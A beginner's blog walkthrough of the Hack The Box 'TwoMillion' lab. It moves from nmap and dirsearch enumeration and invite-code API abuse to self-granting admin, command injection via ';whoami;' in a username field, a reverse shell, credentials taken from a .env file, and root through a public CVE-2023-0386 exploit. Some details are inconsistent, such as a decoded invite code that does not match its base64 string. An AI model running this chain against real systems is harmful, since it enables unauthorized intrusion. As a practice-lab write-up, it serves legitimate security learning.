Hack The Box | TwoMillion Walkthrough

Hi!!

Welcome to my first blog so please ignore any type of grammar errors.

Banner

Before starting, you can add 2million.htb to /etc/hosts

Enumeration

Nmap scan

nmap -T4 -v -p- -sCV <target_ip>

nmap scan

We got two open ports: port 22 running a SSH and port 80 running HTTP.

Directory Fuzzing

I like to use dirsearch.

And while it’s running, i like to go to the web app to navigate through it and do manual enumeration.

dirsearch -u http://2million.htb/

dirsearch

There is no /robots.txt or any interesting endpoints.

So I returned back to manual enumeration and I found one more endpoint /invite.

Finding invite endpoint

I went to navigate through the endpoints and I’ve found i need a invite code to signup an account.

I returned back to /invite because it seems interesting. Taking a further look into the source code, we identify the function shows a POST request towards /api/v1/invite/verify to if the invite code is valid or not.

Invite endpoint source code

In addition to the function, there’s also a js file /js/inviteapi.min.js.

When we look at the file we found a obfuscated js code.

obfuscated code

So when we deobfuscate the code, we get the following code.

function verifyInviteCode(code) {
   var formData = {
      "code": code
   };
   $.ajax({
      type: "POST",
      dataType: "json",
      data: formData,
      url: '/api/v1/invite/verify',
      success: function (response) {
          console.log(response)
      },
      error: function (response) {
          console.log(response)
      }
   })
}

function makeInviteCode() {
    $.ajax({
      type: "POST",
      dataType: "json",
      url: '/api/v1/invite/how/to/generate',
      success: function (response) {
          console.log(response)
      },
      error: function (response) {
          console.log(response)
      }
   })
}

In the code, there are two functions, the first one we saw it in the source code of /invite endpoint used for verfying the invite code. While the second one is used to show us how to generate the invite code with /api/v1/invite/how/to/generate endpoint.

So let’s use curl to request/api/v1/invite/how/to/generate endpoint.

curl -X POST http://2million.htb/api/v1/invite/how/to/generate

curl request

We got an encrypted ROT13 cipher. So when we decrypt it we get:

In order to generate the invite code, make a POST request to \/api\/v1\/invite\/generate

So it seems it telling us to use /api/v1/invite/generate endpoint to generate a invite code.

So let’s use curl again to request to this endpoint.

curl -X POST http://2million.htb/api/v1/invite/generate

curl request

This time, we got an encoded base64 code. So let’s decode it.

cat "NFdMUjQtMDkwRUotTDVEM0UtV0NGWUE=" | base64 -d

And finally, we an invite LAB4B-8ROKZ-LOZGM-YQ4ZCcode . So let’s go and signup for an account.

So here i used dirsearch again with manual enumeration and I got an endpoint /home/access which is used to generate and download vpn files.

I found nothing else and here i decided to test the API responsible of generating and downloading the vpn files.

There is nothing special in the ovpn file. So I tried to request /api endpoint and it just showed me the version of the used API.

So I decided to request /api/v1 and here the surprise. I got all the API endpoints.

requesting /api/v1 endpoint

There’s also something special, we got admin API endpoint. So let’s check if it is accessible for non-admin user or not.

So I started by requesting /api/v1/admin/auth endpoint to check if the current user is an admin.

admin check

As I expected I’m not an admin.

There’s another interesting endpoint /api/v1/admin/setting/update. It gives us errors when requesting it because it needs the request method to be PUT, the content-type header to be Content-Type: application/json and to specify email and is_admin parameters.

So I send the request and It gives me no errors so my user should be admin.

Becoming admin

So let’s check if I’m admin or not by requesting /api/v1/admin/auth endpoint again.

admin check

Foothold

I’m admin now so let’s go check the final admin API endpoint /api/v1/admin/vpn/generate because it was not accessible for non-admin users.

Generating vpn as admin

Nothing special!!

Here, I told myself why not trying to do some injections and as i expected i found its vulnerable to RCE inserting the command ;whoami; in the username parameter and i got a reverse shell with www-data user.

Lateral Movement

By listing the files of current directory I found .env readable file and it seems interesting so I decided to read it and I got admin user credentials.

admin credentials

So I decided to login to ssh using the credentials.

After login, it shows there is a mail.

ssh

So let’s check /var/mail/admin.

Linux kernel exploit

The mail mentioned there is a CVE related to the Linux Kernel and OverlayFS/Fuse vulnerability. With a little bit searching on google we get the CVE and it’s CVE-2023–0386.

I decided to use this github repo https://github.com/sxlmnwb/CVE-2023-0386

I transfered the files and followed the POC and I got root.

root

Conclusion

I hope you like the walkthrough. I waiting for your comments.

This was great fun!